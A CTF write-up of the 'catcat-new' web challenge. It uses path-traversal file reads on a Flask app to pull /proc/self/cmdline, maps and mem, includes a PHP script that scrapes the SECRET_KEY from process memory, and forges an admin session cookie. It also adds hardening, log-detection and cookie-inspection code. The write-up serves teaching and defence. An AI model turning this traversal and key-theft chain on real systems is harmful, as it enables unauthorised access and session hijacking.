攻防世界 web: catcat-new
Clicking on a cat gives a URL of the form ?file=xxx.txt, which looks like an arbitrary file read. ../etc/passwd reports that the file does not exist; ../../etc/passwd reads it.
Reading the process file /proc/self/cmdline
The writeup goes straight to reading the current process's command line with ?file=../../../proc/self/cmdline (while I was still looking for where flag.txt might be).
The command line shows app.py, so the application is written in Python, and a file called app.py is most likely a Flask project's main program (that is the usual name for a Flask entry point).
Build a path to app.py to get the source; it is at ../app.py.
"Copy the text and pretty-print the f-string formatted output" is what you will read on many blogs, but they never explain how (it may also be that I am just too green to know...)
Addendum: "pretty-print the f-string formatted output" means reformatting code that uses f-strings (Python's formatted string literal syntax) so that it is more readable, tidy and conventional.
Basic f-string usage:

```python
# Syntax: prefix the string with f or F and put the expression to embed inside {}.
name = "Alice"
age = 25
info = f"姓名:{name},年龄:{age}"
print(info)
```
I used an AI to do the pretty-printing; the code that does it is too long to include.
See the supplement at the end for the second method.
Auditing the app.py source
```python
import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
    __name__,
    static_url_path='/',
    static_folder='static'
)
app.config['SECRET_KEY'] = f"{str(uuid.uuid4()).replace('-', '')}*abcdefgh"

if os.path.isfile("/flag"):
    flag = cat("/flag")
    os.remove("/flag")


@app.route('/', methods=['GET'])
def index():
    detailtxt = os.listdir('./details/')
    cats_list = [i[:i.index('.')] for i in detailtxt]
    return render_template(
        "index.html",
        cats_list=cats_list,
        cat=cat
    )


@app.route('/info', methods=['GET', 'POST'])
def info():
    file_param = request.args.get('file', "")
    start_param = request.args.get('start', "0")
    end_param = request.args.get('end', "0")
    # user input is concatenated into the path with no validation at all
    filename = f"./details/{file_param}"
    name = file_param[:file_param.index('.')] if '.' in file_param else ""
    return render_template(
        "detail.html",
        catname=name,
        info=cat(filename, start_param, end_param)
    )


@app.route('/admin', methods=['GET'])
def admin_can_list_root():
    # the only way to the flag: a session whose admin value is 1
    if session.get('admin') == 1:
        return f"{flag}"
    else:
        session['admin'] = 0
        return "NoNoNo"


if __name__ == '__main__':
    app.run(
        host='0.0.0.0',
        debug=False,
        port=5637
    )
```
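The /info route above concatenates the file parameter straight into the path. As an added example (not part of the challenge source), here is that construction beside a hardened resolver that only serves plain <name>.txt entries inside details/ and bounds the start/end window, run against the file= values used in this writeup; the details directory and its cat file are constructed in a temporary directory.

```python
import os
import tempfile

DETAILS_DIR = "./details"  # the directory app.py serves cat descriptions from


def vulnerable_path(file_param):
    """What app.py's /info route does: the query parameter is concatenated
    into the path unchanged, so '..' segments walk out of ./details/ and
    /proc/self/... becomes reachable."""
    return f"{DETAILS_DIR}/{file_param}"


def hardened_path(file_param, base_dir=DETAILS_DIR):
    """Resolve file_param to a file inside base_dir or raise ValueError.

    The name must be a single path component ending in .txt, and the
    symlink-free resolved path must still sit under base_dir."""
    if not file_param or "\0" in file_param:
        raise ValueError("empty or NUL-containing name")
    if os.path.isabs(file_param) or "/" in file_param or "\\" in file_param:
        raise ValueError("path separators are not allowed")
    if file_param in (".", "..") or not file_param.endswith(".txt"):
        raise ValueError("only plain <name>.txt entries are served")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, file_param))
    # realpath follows symlinks, so a link planted inside details/ that points
    # elsewhere is caught here even though the name itself looked harmless.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the details directory")
    return candidate


def parse_range(start_param, end_param, max_len=64 * 1024):
    """app.py hands start/end to cat() unchecked; require non-negative
    integers, end >= start and a bounded window."""
    try:
        start, end = int(start_param), int(end_param)
    except ValueError:
        raise ValueError("start/end must be integers") from None
    if start < 0 or end < start or end - start > max_len:
        raise ValueError("range out of bounds")
    return start, end


def is_allowed(file_param, base_dir):
    try:
        hardened_path(file_param, base_dir)
        return True
    except ValueError:
        return False


def make_demo_dir():
    """Constructed stand-in for details/: a temp directory with one cat file."""
    base = tempfile.mkdtemp(prefix="details-")
    with open(os.path.join(base, "cat1.txt"), "w") as f:
        f.write("a constructed cat description\n")
    return base


# The file= values from this writeup, plus two edge cases.
PAYLOADS = ["cat1.txt", "../../etc/passwd", "../../../proc/self/cmdline",
            "../../../proc/self/mem", "/etc/passwd", ""]


def run_demo(base_dir=None):
    """Map each payload to (where the naive join points, hardened verdict)."""
    base_dir = base_dir or make_demo_dir()
    return {p: (os.path.normpath(vulnerable_path(p)), is_allowed(p, base_dir))
            for p in PAYLOADS}


if __name__ == "__main__":
    for param, (naive, ok) in run_demo().items():
        print(f"{param!r:30} naive -> {naive:25} hardened -> "
              f"{'served' if ok else 'rejected'}")
```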
The source touches flag in only two places. The first is the os.path.isfile block, which reads /flag and then immediately removes it, so nothing can be done with that; the second is the /admin route, which returns the flag when the session has admin == 1.
So this is session forgery. Forging a Flask session needs the SECRET_KEY, which the source does not reveal (it is generated from a UUID at startup), but it can be recovered from process memory. /proc/self/mem is large and contains regions that cannot be read, so reading it directly crashes the program; first read /proc/self/maps to get the address ranges of the readable mappings, then read /proc/self/mem only within those ranges. By the same reasoning as the cmdline read, maps is at ?file=../../../proc/self/maps and mem at ?file=../../../proc/self/mem.
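An added example, not from the writeup, of what the sequence just described looks like from the defender's side: a scanner over constructed access-log lines (combined log format, modelled on the requests in this post) that flags file parameters escaping details/ and reads of /proc, including percent-encoded variants and the start/end window on /proc/self/mem.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format) modelled on the request
# sequence in this writeup: one normal cat view, then the traversal probes.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Sep/2025:14:25:10 +0000] "GET /info?file=cat1.txt HTTP/1.1" 200 512
10.0.0.7 - - [22/Sep/2025:14:26:01 +0000] "GET /info?file=../../etc/passwd HTTP/1.1" 200 1432
10.0.0.7 - - [22/Sep/2025:14:26:20 +0000] "GET /info?file=..%2F..%2F..%2Fproc%2Fself%2Fcmdline HTTP/1.1" 200 90
10.0.0.7 - - [22/Sep/2025:14:27:05 +0000] "GET /info?file=../../../proc/self/maps HTTP/1.1" 200 18221
10.0.0.7 - - [22/Sep/2025:14:27:40 +0000] "GET /info?file=../../../proc/self/mem&start=93876304150528&end=93876304166912 HTTP/1.1" 200 16384
10.0.0.9 - - [22/Sep/2025:14:30:00 +0000] "GET /admin HTTP/1.1" 200 6
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SENSITIVE_PREFIXES = ("/proc/", "/etc/", "/flag")


def classify_file_param(file_param):
    """Reasons a value of the file parameter is suspicious. The app builds
    "./details/" + file_param, so normalise the same concatenation against a
    fixed /details root: anything that no longer sits under it has escaped."""
    reasons = []
    resolved = posixpath.normpath("/details/" + file_param)
    if resolved != "/details" and not resolved.startswith("/details/"):
        reasons.append("traversal out of details/")
    for prefix in SENSITIVE_PREFIXES:
        if resolved.startswith(prefix):
            reasons.append(f"targets {prefix}")
    if resolved.startswith("/proc/") and resolved.endswith("/mem"):
        reasons.append("process memory read")
    return reasons


def scan_log(text):
    """Return (ip, file value, reasons) for every /info request whose file
    parameter is suspicious. parse_qs percent-decodes, so encoded traversal
    sequences are normalised before classification."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/info":
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("file", []):
            reasons = classify_file_param(value)
            if "process memory read" in reasons and ("start" in params or "end" in params):
                reasons.append("explicit byte range on /proc/self/mem")
            if reasons:
                findings.append((m.group("ip"), value, reasons))
    return findings


def per_source(findings):
    """Count suspicious requests per client IP to surface the probing host."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, value, reasons in hits:
        print(f"{ip} file={value!r}: {', '.join(reasons)}")
    print("per source:", per_source(hits))
```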
Contents of /proc/self/maps. The response is a Python bytes repr (b'...' with the lines separated by literal \n sequences) listing the mappings of python3.7, the heap, the loaded shared libraries and the stack.
Writing a script to obtain the secret_key
```php
<?php
if (version_compare(PHP_VERSION, '7.0.0', '<')) {
    die("必须使用PHP 7.0及以上版本");
}

$url = "http://61.147.171.105:65402/";
$s_key = "";
$bypass = "../..";

// MockApp and FSCM are not used by the search below.
class MockApp {
    private $secret_key;
    public function __construct($secret_key) {
        $this->secret_key = $secret_key;
    }
    public function getSecretKey() {
        return $this->secret_key;
    }
}

abstract class FSCM {
    public static function encode($secret_key, $session_cookie_structure) {
        try {
            $app = new MockApp($secret_key);
            $session_data = json_decode($session_cookie_structure, true);
            if (json_last_error() !== JSON_ERROR_NONE) {
                throw new Exception("会话结构解析错误");
            }
            $serialized = json_encode($session_data);
            return $serialized;
        } catch (Exception $e) {
            return "[编码错误] " . $e->getMessage();
        }
    }
}

$map_url = $url . "info?file={$bypass}/proc/self/maps";
$map_response = file_get_contents($map_url);
if ($map_response === false) {
    die("无法获取maps信息");
}

// The maps dump comes back as a Python bytes repr, so the lines are separated
// by a literal backslash-n, not a real newline.
$map_list = explode("\\n", $map_response);
foreach ($map_list as $line) {
    // only readable/writable mappings (rw-p): the heap and data segments
    if (preg_match('/([a-z0-9]+)-([a-z0-9]+) rw/', $line, $matches)) {
        $start = hexdec($matches[1]);
        $end = hexdec($matches[2]);
        echo "找到可读写地址: " . $start . " - " . $end . "\n";
        $mem_url = $url . "info?file={$bypass}/proc/self/mem&start={$start}&end={$end}";
        $mem_response = file_get_contents($mem_url);
        if ($mem_response === false) {
            echo "无法读取mem内容: " . $mem_url . "\n";
            continue;
        }
        // the key is 32 hex characters followed by the fixed suffix from app.py
        if (strpos($mem_response, '*abcdefgh') !== false) {
            if (preg_match_all('/[a-z0-9]{32}\*abcdefgh/', $mem_response, $secret_keys)) {
                if (!empty($secret_keys[0])) {
                    echo "Secret Key: " . $secret_keys[0][0] . "\n";
                    $s_key = $secret_keys[0][0];
                    break;
                }
            }
        }
    }
}
?>
```
Secret key obtained: a8a85c112c604e84a1fe7ceddb69a658*abcdefgh
In app.py the key is built as

```python
app.config['SECRET_KEY'] = f"{str(uuid.uuid4()).replace('-', '')}*abcdefgh"
```

so it is a UUID4 with the hyphens removed followed by the fixed suffix *abcdefgh, which is exactly the pattern the script's regex searches for.
Next, forge the session: visit /admin, capture the request and modify the cookie.
Original: `session=eyJhZG1pbiI6MH0.aNFl8Q.SLMenYZTtG1FFllVRAKCoECNv7A`
Downloading and using flask_session_cookie_manager
Forging the session also requires the flask_session_cookie_manager tool.
Download: GitHub - noraj/flask-session-cookie-manager (:cookie: Flask Session Cookie Decoder/Encoder). It needs a Python 2 or Python 3 environment.
Usage

```shell
# encode
python flask_session_cookie_manager3.py encode -s 'your_secret_key' -t '{"username": "admin", "number": "123456"}'
# decode
python flask_session_cookie_manager3.py decode -c 'your_encoded_cookie' -s 'your_secret_key'
```
First decode the original session to see its format, then change admin to 1 in the same format and encode it to obtain the new session.
Capture the request in Burp and replace the session.
Note: a problem you may run into.
When you make the final change, acting too quickly yields no flag. This is because the local clock and the server clock differ: the locally generated session carries a newer timestamp, and it only becomes valid after some time has passed.
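An added example, not from the writeup or the linked tool, that takes the captured session cookie apart the way an analyst would: it decodes the payload and the signing timestamp, recomputes Flask's signature (HMAC-SHA1 with the key derived from SECRET_KEY and the salt "cookie-session") for a candidate key, and mirrors the age check behind the note above. It assumes itsdangerous 2.x, which rejects a cookie whose timestamp is ahead of the server clock as well as an expired one.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Cookie captured in the writeup before any modification (server-issued).
CAPTURED = "eyJhZG1pbiI6MH0.aNFl8Q.SLMenYZTtG1FFllVRAKCoECNv7A"
# Constants from Flask's SecureCookieSessionInterface.
SALT = b"cookie-session"          # salt used for key derivation
MAX_AGE = 31 * 24 * 3600          # PERMANENT_SESSION_LIFETIME default


def _b64url_decode(s):
    # itsdangerous strips the '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def split_cookie(cookie):
    """payload.timestamp.signature, split from the right like itsdangerous
    does (a payload that starts with '.' is zlib-compressed)."""
    value, sig = cookie.rsplit(".", 1)
    payload, ts = value.rsplit(".", 1)
    return payload, ts, sig


def decode_payload(cookie):
    """Session contents without any signature check (the analyst's view)."""
    payload, _, _ = split_cookie(cookie)
    compressed = payload.startswith(".")
    raw = _b64url_decode(payload[1:] if compressed else payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def signed_at(cookie):
    """Unix time the cookie was signed: a big-endian int, base64url-encoded."""
    _, ts, _ = split_cookie(cookie)
    return int.from_bytes(_b64url_decode(ts), "big")


def verify_signature(cookie, secret_key):
    """Recompute the signature: key = HMAC-SHA1(secret_key, salt),
    signature = HMAC-SHA1(key, 'payload.timestamp'), constant-time compare."""
    payload, ts, sig = split_cookie(cookie)
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    expected = hmac.new(derived, f"{payload}.{ts}".encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def timestamp_status(cookie, now, max_age=MAX_AGE):
    """Mirror TimestampSigner's age check (itsdangerous 2.x behaviour, assumed):
    too old -> 'expired'; signed after the server's 'now' -> 'future';
    otherwise 'ok'. The 'future' case is the delay described in the note."""
    age = now - signed_at(cookie)
    if age > max_age:
        return "expired"
    if age < 0:
        return "future"
    return "ok"


def inspect(cookie, candidate_key, now):
    """One-shot report for a captured cookie against a candidate key."""
    return {
        "payload": decode_payload(cookie),
        "signed_at": signed_at(cookie),
        "signature_valid": verify_signature(cookie, candidate_key),
        "timestamp": timestamp_status(cookie, now),
    }


if __name__ == "__main__":
    # "not-the-real-key" is a constructed placeholder, so the signature fails
    print(inspect(CAPTURED, "not-the-real-key", signed_at(CAPTURED) + 30))
```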
Supplementary knowledge
Python stores objects on the heap, and app is a Flask object.
In the Flask framework, app is normally an instance of the Flask class; this follows from Flask's design philosophy and working mechanism, mainly for the following reason:
- Flask is an "instance-driven" framework
Flask uses a "one application, one instance" design. The Flask class encapsulates the core functionality of a web application (routing, request handling, configuration loading, template rendering, and so on), and only by instantiating Flask do you get a web application entity with those capabilities.
For example, the most basic Flask application:
```python
from flask import Flask

app = Flask(__name__)


@app.route('/')
def index():
    return 'Hello World'


if __name__ == '__main__':
    app.run()
```
Here app is the Flask instance, the "entry point" and "core carrier" of the whole application.
proc/self
/proc is a virtual filesystem provided by the Linux kernel (it takes no disk space) that dynamically exposes kernel state, process information, hardware details and similar data. Within it, the /proc/[PID]/ directory (e.g. /proc/1234/) holds the details of the process with PID 1234.
What makes /proc/self/ special is that it is a symbolic link that dynamically points to the /proc/[PID]/ directory of whichever process is accessing it.
The files and subdirectories under it are all virtual files that reflect the process's live state. Common ones:
| File / directory | Purpose |
| --- | --- |
| cmdline | The command-line arguments the process was started with (NUL-separated); e.g. `cat /proc/self/cmdline` shows the command line of that cat process. |
| status | Basic status information: PID, PPID (parent PID), memory usage, run state (R/S/Z, etc.), UID/GID. |
| environ | The process's environment variables (NUL-separated); e.g. `strings /proc/self/environ` shows the current process's environment. |
| fd/ | Subdirectory of symbolic links to every file descriptor the process has open (fd/0 is stdin, fd/1 is stdout). |
| cwd | Symbolic link to the process's current working directory. |
| exe | Symbolic link to the process's executable (e.g. /proc/self/exe points to the running program). |
| maps | The process's memory mappings: the address ranges of the code segment, data segment, shared libraries and so on. |
| stat | Process statistics in a compact format (CPU time, priority, etc.), meant to be parsed by programs. |
bytes.decode()
A leading b marks a Python bytes object, and its decode() method can be called directly:

```python
a = b'abc\nabc'
print(a.decode())

# usage on the dumped content
print(b'*****************'.decode())
```